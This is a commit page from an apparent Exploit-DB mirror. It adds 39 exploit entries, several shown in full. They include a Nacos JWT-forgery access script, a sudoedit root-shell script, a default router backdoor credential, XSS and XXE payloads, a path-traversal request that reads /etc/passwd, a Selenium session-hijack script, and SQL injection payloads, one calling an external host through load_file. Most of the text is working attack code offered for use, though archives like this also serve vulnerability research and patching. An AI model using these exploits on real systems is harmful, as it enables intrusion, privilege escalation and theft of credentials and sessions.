bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-04-04

Browse source 
39 changes to exploits/shellcodes/ghdb

ProLink PRS1841 PLDT Home fiber - Default Password

Nacos 2.0.3 - Access Control vulnerability

sudo 1.8.0 to 1.9.12p1 - Privilege Escalation

sleuthkit 4.11.1 - Command Injection

Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)

ManageEngin AMP 4.3.0 - File-path-traversal

SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)

AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)
Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated
Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated

ChiKoi v1.0 - SQL Injection

ERPGo SaaS 3.9 - CSV Injection

GLPI  Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)

GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin
GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion
GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure
GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)

Metform Elementor Contact Form Builder v3.1.2 - Unauthenticated Stored Cross-Site Scripting (XSS)

MyBB 1.8.32 - Remote Code Execution (RCE) (Authenticated)

Paid Memberships Pro  v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection

pimCore v5.4.18-skeleton  - Sensitive Cookie with Improper SameSite Attribute

Prizm Content Connect v10.5.1030.8315 - XXE

SLIMSV 9.5.2 - Cross-Site Scripting (XSS)

WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE

Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)
Roxy WI v6.1.0.0 - Improper Authentication Control
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload

Solaris 10 libXm - Buffer overflow Local privilege escalation

Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path

Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow

HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path

Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path

Windows 11 10.0.22000 -  Backup service Privilege Escalation

Windows/x86 - Create Administrator User / Dynamic PEB & EDT method null-free Shellcode (373 bytes)
This commit is contained in:
Exploit-DB 2023-04-04 00:16:32 +00:00
parent 3de26153c8
commit d4e68dbb7e
39 changed files with 2564 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
exploits/hardware/remote/51158.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Router backdoor - ProLink PRS1841 PLDT Home fiber
# Date: 12/8/2022
# Exploit Author: Lawrence Amer @zux0x3a
# Vendor Homepage: https://prolink2u.com/product/prs1841/
# Firmware : PRS1841 U V2
# research: https://0xsp.com/security%20research%20%20development%20srd/backdoor-discovered-in-pldt-home-fiber-routers/
Description
========================
A silent privileged backdoor account discovered on the Prolink PRS1841 routers; allows attackers to gain command execution privileges to the router OS.
The vulnerable account issued by the vendor was identified as "adsl" and
"realtek" as the default password; attackers could use this account to
access the router remotely/internally using either Telnet or FTP
protocol.
PoC
=============================
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/cli

112
exploits/java/webapps/51205.py Executable file
View file

@ -0,0 +1,112 @@
# Exploit Title: Nacos 2.0.3 - Access Control vulnerability
# Date: 2023-01-17
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://nacos.io/
# Software Link: https://github.com/alibaba/nacos/releases/
# Version: Up to (including)2.0.3
# Tested on: Windows 10
# CVE : CVE-2021-43116
# Required before execution: pip install PyJWT,requests
import argparse
import base64
import requests
import time
import json
from jwt.algorithms import has_crypto, requires_cryptography
from jwt.utils import base64url_encode, force_bytes
from jwt import PyJWS
class MyPyJWS(PyJWS):
def encode(self,
payload, # type: Union[Dict, bytes]
key, # type: str
algorithm='HS256', # type: str
headers=None, # type: Optional[Dict]
json_encoder=None # type: Optional[Callable]
):
segments = []
if algorithm is None:
algorithm = 'none'
if algorithm not in self._valid_algs:
pass
# Header
header = {'alg': algorithm}
if headers:
self._validate_headers(headers)
header.update(headers)
json_header = force_bytes(
json.dumps(
header,
separators=(',', ':'),
cls=json_encoder
)
)
segments.append(base64url_encode(json_header))
segments.append(base64url_encode(payload))
# Segments
signing_input = b'.'.join(segments)
try:
alg_obj = self._algorithms[algorithm]
key = alg_obj.prepare_key(key)
signature = alg_obj.sign(signing_input, key)
except KeyError:
if not has_crypto and algorithm in requires_cryptography:
raise NotImplementedError(
"Algorithm '%s' could not be found. Do you have cryptography "
"installed?" % algorithm
)
else:
raise NotImplementedError('Algorithm not supported')
segments.append(base64url_encode(signature))
return b'.'.join(segments)
def JwtGenerate():
Secret = 'SecretKey01234567890123456789012345678901234567890123456789012345678'
payload = json.dumps(
{
"sub": "nacos",
"exp": int(time.time()) + 3600
},
separators=(',', ':')
).encode('utf-8')
encoded_jwt = MyPyJWS().encode(payload, base64.urlsafe_b64decode(Secret), algorithm='HS256')
return encoded_jwt.decode()
def check(url, https, token):
if https:
r = requests.get(
url='https://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=',
verify=False)
else:
r = requests.get(
url='http://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=')
if r.status_code == 403:
print("There is no CVE-2021-43116 problem with the url!")
else:
print("There is CVE-2021-43116 problem with the url!")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="URL of the target. example: 192.168.1.1:8848")
parser.add_argument("-s", "--https", help="Whether https is used. Default is false")
args = parser.parse_args()
url = args.target
https = False
if (args.https):
https = args.https
if url:
check(url, https, JwtGenerate())
else:
print('Please enter URL!')

41
exploits/linux/local/51217.sh Executable file
View file

@ -0,0 +1,41 @@
#!/usr/bin/env bash
# Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation
# Exploit Author: n3m1.sys
# CVE: CVE-2023-22809
# Date: 2023/01/21
# Vendor Homepage: https://www.sudo.ws/
# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
# Version: 1.8.0 to 1.9.12p1
# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
#
# Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
#
# Running this exploit on a vulnerable system allows a localiattacker to gain
# a root shell on the machine.
#
# The exploit checks if the current user has privileges to run sudoedit or
# sudo -e on a file as root. If so it will open the sudoers file for the
# attacker to add a line to gain privileges on all the files and get a root
# shell.
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
echo "> Currently installed sudo version is not vulnerable"
exit 1
fi
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
if [ -z "$EXPLOITABLE" ]; then
echo "> It doesn't seem that this user can run sudoedit as root"
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else
echo "> BINGO! User exploitable"
echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$( whoami ) ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..."
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root
exit 0
fi

47
exploits/multiple/local/51225.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: sleuthkit 4.11.1 - Command Injection
# Date: 2023-01-20
# CVE-2022-45639
# Vendor Homepage: https://github.com/sleuthkit
# Vulnerability Type: Command injection
# Attack Type: Local
# Version: 4.11.1
# Exploit Author: Dino Barlattani, Giuseppe Granato
# Link poc: https://www.binaryworld.it/guidepoc.asp#CVE-2022-45639
# POC:
fls tool is affected by command injection in parameter "-m" when run on
linux system.
OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows
attackers to execute arbitrary commands
via a crafted value to the m parameter
when it run on linux, a user can insert in the -m parameter a buffer with
backtick with a shell command.
If it run with a web application as front end it can execute commands on
the remote server.
The function affected by the vulnerability is "tsk_fs_fls()" from the
"fls_lib.c" file
#ifdef TSK_WIN32
{
....
}
#else
data.macpre = tpre; <---------------
return tsk_fs_dir_walk(fs, inode, flags, print_dent_act, &data);
#endif
Run command:
$ fls -m `id` [Options]
--
*Dino Barlattani*
www.linkedin.com/in/dino-barlattani-10bba11a9/
www.binaryworld.it <http://Binaryworld.it>
www.youtube.com/user/dinbar78

30
exploits/multiple/webapps/51218.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)
# Date: [12/21/2022 02:07:23 AM UTC]
# Exploit Author: [geeklinuxman@gmail.com]
# Vendor Homepage: [https://www.red-gate.com/]
# Software Link: [https://www.red-gate.com/products/dba/sql-monitor/]
# Version: [SQL Monitor 12.1.31.893]
# Tested on: [Windows OS]
# CVE : [CVE-2022-47870]
[Description]
Cross Site Scripting (XSS) in the web SQL monitor login page in Redgate
SQL Monitor 12.1.31.893 allows remote attackers to inject arbitrary web
Script or HTML via the returnUrl parameter.
[Affected Component] affected returnUrl in
https://sqlmonitor.*.com/Account/Login?returnUrl=&hasAttemptedCookie=True
affected A tag under span with "redirect-timeout" id value
[CVE Impact]
disclosure of the user's session cookie, allowing an attacker to
hijack the user's session and take over the account.
[Attack Vectors]
to exploit the vulnerability, someone must click on the malicious A
HTML tag under span with "redirect-timeout" id value
[Vendor]
http://redgate.com
http://sqlmonitor.com
https://sqlmonitor.

51
exploits/multiple/webapps/51221.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)
# Date: 19/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: ActiveITzone
# Vendor Homepage: https://activeitzone.com/
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405
# Version: 6.5.0
# Tested on: Live ( Centos & Litespeed Web Server)
# Demo Link : https://demo.activeitzone.com/ecommerce/
# Description #
The Active eCommerce CMS 6.5.0 application has a vulnerability in the
profile picture upload feature that allows for stored cross-site scripting
(XSS) attacks. Specifically, the vulnerability lies in the handling of
"svg" image files, which can contain malicious code. An attacker can
exploit this vulnerability by uploading a specially crafted "svg" image
file as a profile picture, which will then be executed by the application
when the user views the profile. This can allow the attacker to steal
sensitive information, such as login credentials, or to perform other
malicious actions on the user's behalf. This vulnerability highlights the
importance of proper input validation and image file handling in web
application development.
# Exploit Details #
# Vulnerable Path : /aiz-uploader/upload
# Parameter: files (POST)
# Vector: <svg version="1.1" baseProfile="full" xmlns="
http://www.w3.org/2000/svg">
<rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("haha XSS");
</script>
</svg>
# Proof of Concept (PoC) : Exploit #
1) Goto: https://localhost
2) Click Registration
3) Login Your Account
4) Go Manage Profile
5) Now Upload Given Vector as anyname.svg (you must put vector code in
anyname.svg file)
6) After Upload Clic to view Your profile picture
7) XSS Popup Will Fired
# Image PoC : Reference Image #
1) Payload Fired: https://prnt.sc/cW0F_BtpyMcv

235
exploits/multiple/webapps/51222.txt Normal file
View file

@ -0,0 +1,235 @@
## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal
## Author: nu11secur1ty
## Date: 11.22.2023
## Vendor: https://www.manageengine.com/
## Software: https://www.manageengine.com/privileged-session-management/download.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)
## Description:
The `pmpcc` cookie is vulnerable to path traversal attacks, enabling
read access to arbitrary files on the server.
The testing payload
..././..././..././..././..././..././..././..././..././..././etc/passwd
was submitted in the pmpcc cookie.
The requested file was returned in the application's response.
The attacker easy can see all the JS structures of the server and can
perform very dangerous actions.
## STATUS: HIGH Vulnerability
[+] Exploits:
```GET
GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1
Host: localhost:9292
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;
_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;
JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;
JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Mobile: ?0
X-Requested-With: XMLHttpRequest
Sec-CH-UA-Platform: Windows
Referer: https://localhost:9292/AMPHome.html
```
[+] Response:
```
,'js.pmp.helpCertRequest.subcontent10':'The issued certificate is
e-mailed to the user who raises the request, the user who closes the
request and also to those e-mail ids specified at the time of closing
the request.'
,'js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username'
,'js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Next
synchronization is scheduled to run on'
,'js.agent.csharp_Windows_Agent':'C# Windows Agent'
,'js.PassTrixMainTab.in_sec':'Seconds'
,'godaddy.importcsr.selectfileorpastecontent':'Either select a file or
paste the CSR content.'
,'js.connection.colors':'Colors'
,'js.general.ShareToGroups':'Share resource to user groups'
,'js.connection.mapdisk':'Drives'
,'jsp.admin.Support.User_Forums':'User Forums'
,'js.general.CreateResource.Dns_url_check':'Enter a valid URL . For
cloud services (Rackspace and AWS IAM), the DNS name <br>looks like a
URL (ex: https:\/\/identity.api.rackspacecloud.com\/v2.0)'
,'js.admin.RPA_Integration.About':'PAM360 renders bots that seamlessly
integrate and perfectly fit into the pre-designed and automated
integrations of the below listed RPA-powered platforms, to simulate
the routine manual password retrieval from the PAM360 vault.'
,'js.discovery.loadhostnamefromfile':'From file'
,'js.AddListenerDetails.Please_enter_valid_implementation_class':'Please
enter a valid Implementation Class'
,'js.general.GroupedResources':'Grouped Resources'
,'js.general.SlaveServer':'This operation is not permitted in Secondary Server.'
,'PROCESSID':'Process Id'
,'js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Services
fetched successfully'
,'assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled'
,'js.commonstr.search':'Search'
,'js.discovery.usercredential_type':'Credential Type'
,'jsp.admin.GeneralSetting.Check_high_availability_status_for':'Check
high availability status every <input type=\"text\" class=\"txtbox\"
name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"
style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"
> minutes.'
,'pki.js.help.entervalidnumber':'Please enter a valid number for
Numeric Field Default Value.'
,'js.remoteapp.fetch':'Fetch'
,'js.admin.HighAvailability.configured_successfully':'Configured Successfully'
,'js.generalSettings_searchTerm_Password_reset':'Password Reset,
Reason for password reset, disable ticket id, waiting time, wait time
for service account password reset, linux unix password reset'
,'letsencrypt.enter.domainnames':'Enter domain names'
,'js.discovery.resourcetype':'Resource Type'
,'js.HomeTab.UserTab':'Set this tab as default view for \'Users\''
,'js.report.timeline.todate':'Valid To'
,'js.general_Language_Changed_Successfully':'Language Changed Successfully'
,'js.aws.credentials.label':'AWS Credential'
,'auditpurge.helpnote1':'Enter 0 or leave the field blank to disable
purging of audit trails.'
,'js.general.user.orgn_bulkManage':'Manage Organization'
,'js.rolename.SSH_KEY':'Create\/Add key'
,'js.admin.admin.singledbmultiserver.name':'Application Scaling'
,'lets.encrypt.requestreport':'Let\'s Encrypt Requests Report'
,'js.settings.breach_settings.disable_api':'Disable API Access'
,'js.cmd.delete.not_possible':'Command cannot be deleted as it is
already added to the following command set(s).'
,'js.settings.notification.domaincontent':'Notify if domains are
expiring within'
,'js.aws.searchuser':'--Search UserName--'
,'jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketing
system settings in Admin >> General >> Ticketing System Integration.'
,'js.discovery.port':'Gateway Port'
,'usermanagement.showCertificates':'Show Certificates'
,'js.general.DestinationDirectoryCannotBeEmpty':'Destination directory
cannot be empty'
,'js.sshreport.title':'SSH Resource Report'
,'js.encryptionkey.update':'Update'
,'js.aws.regions':'Region'
,'js.settingsTitle1.UserManagement':'User Management'
,'js.passwordPolicy.setRange':'Enforce minimum or maximum password length'
,'js.commonstr.selectResources':'Select Resources'
,'RULENAME':'Rule Name'
,'jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'User
Group added successfully'
,'js.reports.SSHReports.title':'SSH Reports'
,'js.CommonStr.ValueIsLess':'value is less than 2'
,'js.discovery.discoverystatus':'Discovery Status'
,'js.settings.security_settings.Web_Access':'Web Access'
,'js.general.node_name_cannot_be_empty':'Node name cannot be empty'
,'js.deploy.audit':'Deploy Audit'
,'js.agentdiscovery.msca.title':'Microsoft Certificate Authority'
,'jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominate
user group(s) to exempt from access control.'
,'js.pki.SelectCertificateGroup':'Select Certificate Group(s)'
,'js.admin.HighAvailability.High_Availability_status':'Status'
,'settings.metracker.note0':'Disable ME Tracker if you do not wish to
allow ManageEngine to collect product usage details.'
,'SERVICENAME':'Service Name'
,'settings.metracker.note1':'Access Manager Plus server has to be
restarted for the changes to take effect.'
,'js.general.NewPinMismatch':'New PIN Mismatch'
,'js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\''
,'java.ScheduleUtil.minutes':'minutes'
,'js.admin.sdpop_change.tooltip':'Enabling this option will require
your users to provide valid Change IDs for the validation of password
access requests and other similar operations. Leaving this option
unchecked requires the users to submit valid Request IDs for
validation.'
,'js.privacy_settings.title.redact':'Redact'
,'js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25
resources can be selected'
,'js.aboutpage.websitetitle':'Website'
,'js.customize.NumericField':'Numeric Field'
,'js.please.select.file':'Please select a file to upload.'
,'js.AutoLogon.Remote_connections':'Remote Connections'
,'pki.snmp.port':'Port'
,'java.dashboardutils.TODAY':'TODAY'
,'js.schedule.starttime':'Start Time'
,'js.ssh.keypassphrase':'Passphrase'
,'js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus'
,'js.analytics.tab.ueba.msg4':'guide'
,'js.analytics.tab.ueba.msg5':'to complete the integration. For any
further questions, please write to us at
pam360-support@manageengine.com.'
,'js.reportType.Option7.UserAuditReport':'Audit Report'
,'js.common.csr':'CSR'
,'js.globalsign.reissue.order':'Reissue Order'
,'js.analytics.tab.ueba.msg6':'Build a platform of expected behavior
for individual users and entities by mapping different user accounts'
,'js.analytics.tab.ueba.msg7':'Verify actionable reports that
symbolize compromise with details about actual behavior and expected
behavior.'
,'js.resources.importcredential':'Import Credentials'
,'js.analytics.tab.ueba.msg1':'The Advanced Analytics module for
PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from
different sources, including firewalls, routers, workstations,
databases, file servers and cloud services. Any deviation from normal
behavior is classified as a time, count, or pattern anomaly. It then
gives actionable insight to the IT Administrator with the use of risk
scores, anomaly trends, and intuitive reports.'
,'js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:'
,'js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360
instance, download Log360 UEBA from the below link and follow the
instructions in this'
,'js.settingsTitle2.MailServer':'Mail Server'
,'jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'Managing
AMP Encryption Key'
,'settings.unmappedmails.email':'E-mail Address'
,'amp.connection.connection_type':'Connection Type'
,'js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior based
on activity time, count, and pattern.'
,'godaddy.contactphone':'Contact Phone'
,'js.general.HelpDeskIntegrate.ClassSameException':'Class name already
implemented. Implement with some other class.'
,'js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors in
Windows devices, SQL servers, FTP servers, and network devices such as
routers, firewalls, and switches.'
,'js.rolename.freeCA.acme':'ACME'
,'digicert.label.dcv.cname':'CNAME Token'
,'js.helpcontent.createuser':'User Creation '
,'pgpkeys.key.details':'Key Information'
,'js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status'
,'js.HomeTab.TaskAuditView':'Task Audit'
,'pki.js.certs.certGroupsSharedByUserGroups':'Certificate Groups
Shared With User Group(s)'
,'js.common.importcsr.format':'(File format should be .csr)'
,'js.notificationpolicy.Submit':'Save'
,'pmp.vct.User_Audit_Configuration':'User Audit Configuration'
...
...
...
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))
## Reference:
[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)
## Proof and Exploit:
[href](https://streamable.com/scdzsb)
## Time spent
`03:00:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit Data Base https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

14
exploits/php/webapps/51185.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: Prizm Content Connect v10.5.1030.8315 - XXE
# Date: 21/12/2022
# Exploit Author: @xhzeem
# Vendor Homepage:
https://help.accusoft.com/PCC/v9.0/HTML/About%20Prizm%20Content%20Connect.html
# Version: v10.5.1030.8315
The Prizm Content Connect v10.5.1030.8315 is vulnerable to XXE
Proof Of Concept:
http://www.example.com/default.aspx?document=file.xml
The file.xml can have an OoB XXE payload or any other blind XXE exploit.

80
exploits/php/webapps/51201.txt Normal file
View file

@ -0,0 +1,80 @@
## Exploit Title: pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute
## Author: nu11secur1ty
## Date: 01.11.2023
## Vendor: https://pimcore.com/en
## Software: https://packagist.org/packages/pimcore/skeleton
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton
## Description:
The pimCore-5.4.18-skeleton suffers from Sensitive Cookie with
Improper SameSite Attribute vulnerability - PHPSESSID cookie Session
management connection requests are not sanitizing correctly.
There are no securing changes in PHPSESSID cookies for every request -
validating sessions and changing a cookie for every connection - POST
Request.
The attacker in the same network can trick the user - the
administrator of this system and can steal his cookie,
then he can make very evil things by using the same session from the
name of the already authenticated user - administrator, on a couple of
PCs with different IPs which are used from different machines into
that network.
When the attacker steals the cookie, he can manipulate the same
session, for example, he can log out or do very malicious stuff.
This is a very stupid developer's error, and this can be very
dangerous for the owner of the system.
The attack is possible also in the external network!
## STATUS: HIGH Vulnerability
[+] Payload:
```Python
#!/usr/bin/python3
# @nu11secur1ty 2023
import time
from selenium import webdriver
driver = webdriver.Chrome()
print("Give the stolen cookie...\n")
cookie = input()
print("Give the domain or IP of the owner of the cookie...\n")
target = input()
driver.maximize_window()
driver.get(target+ 'admin/?_dc=1673370965&perspective=')
driver.add_cookie({'name': 'PHPSESSID', 'value': cookie})
print(driver.get_cookie('PHPSESSID'))
driver.get(target+ 'admin/?_dc=1673370965&perspective=')
time.sleep(3)
print("Press any key to stop the exploit...\n")
input()
print("Your PHPSESSID is PWNED")
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton)
## Reference:
[href](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions)
## Proof and Exploit:
[href](https://streamable.com/lorw8x)
## Time spent
`03:00:00`
## Writing an exploit
`00:25:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

87
exploits/php/webapps/51202.txt Normal file
View file

@ -0,0 +1,87 @@
## Title: ChiKoi-1.0 SQLi
## Author: nu11secur1ty
## Date: 01.12.2023
## Vendor: https://chikoiquan.tanhongit.com/
## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi
## Description:
The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'
was submitted in the User-Agent HTTP header.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The attacker can steal all information from this system and can
seriously harm the users of this system,
such as extracting bank accounts through which they pay each other, etc.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Payload:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND
9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION
SELECT 6994) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND
(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT
(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR
---
```
[+] Online:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)
Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND
8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION
SELECT 6426) END))-- -
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)
## Proof and Exploit:
[href](https://streamable.com/7x69yz)
## Time spent
`01:30:00`
## Writing an exploit
`00:05:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

44
exploits/php/webapps/51204.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Metform Elementor Contact Form Builder v3.1.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
# Google Dork: inurl:metform-form intext:textarea|message
# Date: 14/01/2023
# Exploit Author: Mohammed Chemouri (https://de.linkedin.com/in/chemouri)
# Vendor Homepage: https://wpmet.com/plugin/metform/
# Software Link: https://downloads.wordpress.org/plugin/metform.3.1.2.zip
# Version: <= 3.1.2
# Tested on: WordPress version 6.1.1, PHP version 8.0.27 (64bit)
# CVE : CVE-2023-0084
Description:
An unauthenticated attacker can insert a persistent malicious JavaScript
code via the text-area field and because the input is not properly
sanitized the XSS will be executed each time the victim visits the affected
post.
An attacker can steal admins session or credentials e.g., using a phishing
attack (display fake login page) and may install a JavaScript backdoor like
the Browser Exploitation Framework (BeeF). ,etc.
Reproduction Steps:
1- Create a new form (using MetForm Elementor widgets) and insert a
text-area field and a submit button then publish the form.
2- Visit the created form (no login needed) and insert the following
JavaScript code in the text-area and submit:
<script>alert(0)</script>
3- By visiting MetForm then Entries from the WP-ADMIN panel and viewing the
inserted post the XSS payload will be executed.
Because there is may bots scanning the web and trying to brute-force
admin's credentials or exploit known vulnerabilities this flaw can be also
automated to steal credentials or do actions on behalf of the logged in
user or even install a JavaScript worm like the Browser Exploitation
Framework (BeeF) and make more than 100,000 websites under a high risk.
Remediation:
All fields must be properly sanitized and escaped before being displayed in
the browser. WordPress already offers an API for this purpose.
For more information please refer to:
https://developer.wordpress.org/apis/security/common-vulnerabilities/
